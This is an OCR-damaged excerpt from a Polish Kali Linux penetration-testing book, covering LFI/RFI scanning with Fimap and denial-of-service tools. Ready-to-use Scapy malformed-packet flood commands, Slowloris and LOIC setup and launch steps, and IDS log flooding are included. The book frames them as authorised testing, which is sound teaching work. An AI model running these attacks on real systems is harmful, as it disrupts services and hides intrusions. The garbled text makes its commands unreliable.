Kali Linux Testy penetracyjne
254
Fimap
Fimap to narz dzie napisane w j zyku Python przeznaczone do wyszukiwania i wykorzysty-wania podatno ci i luk w zabezpieczeniach aplikacji internetowych pozwalaj cych na przeprowa-dzanie atakoacutew typu LFI (ang Local File Inclusion) lub RFI (ang Remote File Inclusion)
Aby uruchomi pakiet Fimap w systemie Kali Linux przejd do grupy Kali Linux a nast pniewybierz polecenie Web ApplicationsWeb Vulnerability Scannersfimap Po wybraniu tegopolecenia na ekranie pojawi si nowe okno terminala z wy wietlonym ekranem powitalnympolecenia fimap Dla pakietu fimap istnieje roacutewnie kilka dodatkowych wtyczek ktoacutere mo eszpobra z internetu i zainstalowa za pomoc nast puj cego polecenia
fimap --install -plugins
Dost pne wtyczki zostan wy wietlone w formie listy z opcj pozwalaj c na zainstalowaniewybranej wtyczki lub zako czenie dzia ania polecenia Jak wida w naszym przyk adzie do-st pne s dwie dodatkowe wtyczki st d polecenie instalowania musimy wykona dwukrotnieindywidualnie instaluj c poszczegoacutelne wtyczki (zobacz pierwszy rysunek na nast pnej stronie)
Aby u y pakietu Fimap musisz najpierw poda adres URL witryny ktoacutera b dzie celem skaneraIstnieje wiele metod definiowania adresoacutew URL Mo esz na przyk ad poda jeden wybrany adresURL ca list adresoacutew URL mo esz u y wyszukiwarki Google do zebrania adresoacutew URL
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
255
ale roacutewnie dobrze mo esz u y innych metod takich jak zbieranie wszystkich adresoacutew URLz hiper czy zamieszczonych na danej stronie internetowej czy pozyskiwanie adresoacutew URL z for-mularzy i nag oacutewkoacutew stron W naszym przypadku celem skanera b dzie witryna httpwwwthesecuritybloggercom
Aby uruchomi skanowanie witryny httpwwwthesecuritybloggercom powiniene wpisanast puj ce polecenie
fimap -u httpwwwthesecuritybloggercom
Pakiet Fimap rozpocznie skanowanie i sproacutebuje automatycznie wykry podatno ci na atakitypu LFIRFI Na rysunku przedstawionym poni ej wida jednak e witryna wwwthesecurity
bloggercom jest odporna na tego typu ataki
Ataki typu DoSW zdecydowanej wi kszo ci przypadkoacutew celem przeprowadzania testoacutew penetracyjnych jestidentyfikacja potencjalnych i rzeczywistych podatno ci i luk w zabezpieczeniach bez umy l-nego zak oacutecania dzia ania atakowanego systemu i bez robienia mu krzywdy w jakikolwiek in-ny sposoacuteb Jest to kluczowy element odroacute niaj cy autoryzowanego pentestera od z o liwegonapastnika maj cego niecne zamiary Prawdziwy napastnik nie przestrzega adnych regu
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
256
i nie zwraca uwagi na to czy jego dzia ania spowoduj zak oacutecenia w funkcjonowaniu atako-wanego systemu je eli tylko takie post powanie b dzie dla niego korzystne Czasami zdarzasi nawet e napastnik b dzie wr cz za wszelk cen szuka mo liwo ci zak oacutecenia dzia aniaczy nawet ca kowitego wy czenia atakowanego systemu Z tego powodu w niektoacuterych przypad-kach przeprowadzenie testoacutew odporno ci danej witryny czy aplikacji internetowej na ataki typuDoS (ang Denial of Service) mo e by bardzo po dane Testy tego rodzaju cz sto s nazywanetestami warunkoacutew skrajnych lub testami odporno ci na przeci enie systemu (ang stress testing)
Jedn z najwa niejszych spraw zwi zanych z testami odporno ci na ataki typu DoS jest bezwzgl dne uzyska-nie pisemnej zgody w a ciciela systemu na przeprowadzanie takich atakoacutew Niektoacutere metody atakoacutewmog mie negatywny wp yw na funkcjonowanie systemu nawet po zako czeniu testoacutew Dobrym roz-wi zaniem jest przeprowadzanie takich testoacutew na systemach z redundancj systemach nieprodukcyj-nych czy systemach zainstalowanych w rodowisku laboratoryjnym o ile to oczywi cie mo liwe
Najcz ciej spotykana metoda ataku DoS polega na bdquozalewaniurdquo badanego systemu masowonap ywaj cymi z zewn trz daniami Takie przeci enie zazwyczaj skutecznie uniemo liwiasystemowi odpowiadanie na rzeczywiste dania od autoryzowanych klientoacutew lub co najmniejtak spowalnia wysy anie odpowiedzi e ca y system staje si dla klientoacutew praktycznie bezu-yteczny Ataki typu DoS mog by skierowane na zasoby systemu (np przypisana przestrze
dyskowa przepustowo po cze sieciowych itd) konfiguracj systemu (np usuwanie tablicroutingu) informacje o stanie systemu (np resetowanie sesji TCP) oraz ka dy inny elementrodowiska systemu ktoacuterego przeci enie mo e spowodowa zak oacutecenie jego normalnego
funkcjonowania
Roacute nica pomi dzy atakami DoS (ang Denial of Service) a DDoS (ang Distributed Denial of Service) polega natym e do przeprowadzania ataku DoS napastnik wykorzystuje tylko jeden komputer podczas gdy w przy-padku atakoacutew DDoS liczba maszyn bior cych udzia w ataku mo e si ga tysi cy Omawianie zagadniezwi zanych z atakami DDoS wykracza niestety daleko poza ramy naszej ksi ki
Istniej cztery g oacutewne kategorie atakoacutew DoSDDoS Ataki wykorzystuj ce przeci enie po cze sieciowych (ang Volume Based
Attacks) mdash taki rodzaj ataku jest zwi zany z bdquozalewaniemrdquo atakowanego systemumasowo nap ywaj cymi pakietami UDP ICMP i innymi Celem takiego ataku jestprzeci enie po cze sieciowych atakowanego systemu nadmiernymi ilo ciamiprzesy anych pakietoacutew
Ataki na protoko y komunikacyjne (ang Protocol Attacks) mdash ataki te maj na celunadmierne wykorzystywanie zasoboacutew urz dze sieciowych takich jak routeryzapory sieciowe urz dzenia roacutewnowa ce obci enie po cze sieciowychPrzyk adami atakoacutew na protoko y komunikacyjne s ataki typu SYN floodPing of Death Smurf Teardrop wymuszanie fragmentacji pakietoacutew itp
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
257
Ataki na warstw aplikacji (ang Application Layer Attacks) mdash takie ataki wykorzystujnormalny ruch sieciowy do zak oacutecenia dzia ania lub nawet spowodowania awariidanej witryny lub aplikacji internetowej Przyk adami mog by ataki typu Zero-Dayczy ataki wykorzystuj ce inne podatno ci i luki w zabezpieczeniach witryn i aplikacjiinternetowych
Ataki powoduj ce wyczerpanie zasoboacutew sesji (ang Session Exhaustion) mdash takieataki powoduj wyczerpanie liczby dozwolonych jednocze nie sesji poprzez ci g enawi zywanie nowych po cze bez zamykania starych sesji co prowadzido wyczerpania zasoboacutew systemu
W systemie Kali Linux znajdziesz wiele narz dzi pozwalaj cych na wykorzystywanie podat-no ci i luk w zabezpieczeniach Narz dzia te na przyk ad Metasploit mog by u ywane doprzeprowadzania atakoacutew DoS na warstw aplikacji (wiele z tych narz dzi omawiali my ju wewcze niejszych rozdzia ach) W rozdziale 3 prezentowali my popularne narz dzie Scapypozwalaj ce na przeprowadzanie atakoacutew DoS na protoko y komunikacyjne Poni ej znaj-dziesz omoacutewienie kilku kolejnych narz dzi s u cych do przeprowadzania atakoacutew DoS ktoacuteremo esz znale w systemie Kali Linux
Aby przetestowa skuteczno ataku DoS mo esz u y witryny httpwwwupordownorg ktoacutera sprawdzadost pno podanej witryny internetowej
THX-SSL-DOSProtokoacute SSL (ang Secure Socket Layer) jest u ywany do nawi zywania bezpiecznych po -cze i transakcji w internecie Nawi zanie bezpiecznego po czenia z wykorzystaniem proto-ko u SSL wymaga u ycia po stronie serwera 15 razy wi kszej mocy obliczeniowej ni po stro-nie klienta Atak typu THC-SSL-DOS wykorzystuje t dysproporcj przez proacuteb prze adowaniaserwera spreparowanymi daniami nawi zania sesji SSL a do momentu kiedy przeci onyserwer si poddaje i przestaje odpowiada na dania przesy ane od innych autoryzowanychklientoacutew Atak wykorzystuje mechanizm renegocjacji bezpiecznego po czenia SSL do gene-rowania tysi cy takich da dla pojedynczego po czenia TCP Z tego powodu atak ten jestroacutewnie znany jako atak typu SSL-Exhaustion (ang mdash bdquowyczerpanie zasoboacutew SSLrdquo) Zalettakiego podej cia jest to e mo liwo ci przetwarzania da nawi zania sesji SSL s znaczniewy sze po stronie klienta co oznacza e przeci tny laptop pod czony do sieci za po red-nictwem cza o przeci tnej szybko ci mo e rzuci powa ne wyzwanie niemal ka demu serwero-wi aplikacji internetowych Podatno serweroacutew internetowych na ataki typu SSL-Exhaustionjest powszechnie znana a mimo to nie uda o si jeszcze opracowa skutecznej metody zapo-biegania takim atakom
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
258
Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca
thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept
W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej
Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
259
ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych
Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece
W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia
send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)
Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
260
Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy
Nieprawid owa wersja protoko u IP
send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)
Nieprawid owa suma kontrolna pakietu TCP
send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)
send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)
send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)
Ustawiona tylko flaga FIN
send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)
Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2
send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka pakietu
send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)
ICMP Flood
send(IP(dst=10001)ICMP()iface=eth0count=2000)
Nieprawid owa suma kontrolna pakietu IP
send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)
Fragmentacja pakietoacutew IP
send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
261
roacuted owy adres IP taki sam jak docelowy adres IP
send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)
Brak pakietu warstwy L4
send(IP(dst=10001 src=10203040) iface=eth0 count=2000)
Jednocze nie ustawione flagi SYN i FIN
send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)
Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)
Slowloris
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
262
Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym
programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco
czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera
Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne
Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris
Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej
perl slowlorispl
W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)
perl slowlorispl -dns thesecuritybloggercom
Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)
Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)
Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
263
LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
264
narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki
Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa
Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej
apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs
Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej
mkdir loic
Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej
wget httpsrawgithubcomnicolargoloicinstaller masterloicsh
Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie
chmod 777 loicsh
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
265
Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej
loicsh install
Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie
loicsh update
Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie
loicsh run
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
266
U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny
Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP
Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding
Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane
DNSChef
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
267
Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne
Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera
SniffJoke
SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
268
SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force
Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)
Sk adnia wywo ania polecenia siege jest nast puj ca
siege [opcje] ltadres URL celugt
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
269
Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-
nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku
InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
270
wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS
TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych
Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci
PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce
W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia
W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew
Kup książkę Poleć książkę
Skorowidz
Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275
harmonogram 276zabezpiecze systemu 276
ALE 31analiza
bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych
zawieraj cychoprogramowanie firmware298
ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat
299zawarto ci plikoacutew PDF 299
da HTTP 203aplet Java 156aplikacje internetowe 23
b dy w zabezpieczeniach286
wykrywanie i mapowanie 241zakres testoacutew penetracyjnych
23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212
ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki
brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji
internetowych 147na parametry metod GET
i POST 131na protoko y komunikacyjne
256na serwery aplikacji
internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie
zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151
amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257
wykorzystuj ce przeci eniepo cze sieciowych 256
XSS 223 248z klonowaniem 151z u yciem narz dzi
penetracyjnych opartychna przegl darkach 236
audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301
Authentication hijacking 225Autopsy 295AV 31
BBackTrack 38badanie zasoboacutew sieci
komputerowych 65bazy danych 218BeEF 232
panel zarz dzania pakietu 234przechwycony system 235
bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272
a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania
i urz dze 274podstawowe wymogi 273
bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych
288 291narz dzia 293partycje 292suma kontrolna 294
Kup książkę Poleć książkę
Skorowidz
330
black-box 24 30BootKey 171 173Browser Exploitation
Framework 232brute-force 125 170
